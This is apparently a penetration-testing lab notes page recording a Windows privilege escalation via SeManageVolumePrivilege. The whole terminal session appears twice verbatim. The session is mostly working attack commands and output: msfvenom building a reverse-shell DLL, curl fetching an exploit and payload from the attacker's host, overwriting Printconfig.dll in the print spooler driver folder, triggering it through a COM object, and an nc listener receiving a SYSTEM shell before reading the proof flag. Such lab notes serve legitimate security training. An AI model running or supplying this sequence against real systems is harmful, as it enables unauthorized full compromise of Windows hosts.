Administrator

Previoussvc_mssql NextCredentials / Notes / LL

Last updated 6 months ago

Administrator

PS C:\programdata> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled

$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1339 -f dll > privme.dll

PS C:\programdata> curl 192.168.45.233/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

PS C:\programdata> .\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 922
DONE

PS C:\programdata> curl 192.168.45.233/Printconfig.dll -o Printconfig.dll

PS C:\programdata> cmd
cmd
C:\programdata>copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
Overwrite C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll? (Yes/No/All): Yes
Yes
        1 file(s) copied.

$ nc -lnvp 1339
listening on [any] 1339 ...

PS C:\ProgramData> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\ProgramData> $object = [Activator]::CreateInstance($type)
$object = [Activator]::CreateInstance($type)

$ nc -lnvp 1339
listening on [any] 1339 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.170.187] 49854
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
10e683eaa6bf8936a7d3803862ab79c6

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

C:\Windows\system32>

Previoussvc_mssql NextCredentials / Notes / LL

Last updated 6 months ago

PS C:\programdata> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State   
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled

$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.233 LPORT=1339 -f dll > privme.dll

PS C:\programdata> curl 192.168.45.233/SeManageVolumeExploit.exe -o SeManageVolumeExploit.exe

PS C:\programdata> .\SeManageVolumeExploit.exe
.\SeManageVolumeExploit.exe
Entries changed: 922
DONE

PS C:\programdata> curl 192.168.45.233/Printconfig.dll -o Printconfig.dll

PS C:\programdata> cmd
cmd
C:\programdata>copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\
Overwrite C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll? (Yes/No/All): Yes
Yes
        1 file(s) copied.

$ nc -lnvp 1339
listening on [any] 1339 ...

PS C:\ProgramData> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\ProgramData> $object = [Activator]::CreateInstance($type)
$object = [Activator]::CreateInstance($type)

$ nc -lnvp 1339
listening on [any] 1339 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.170.187] 49854
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
10e683eaa6bf8936a7d3803862ab79c6

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254

C:\Windows\system32>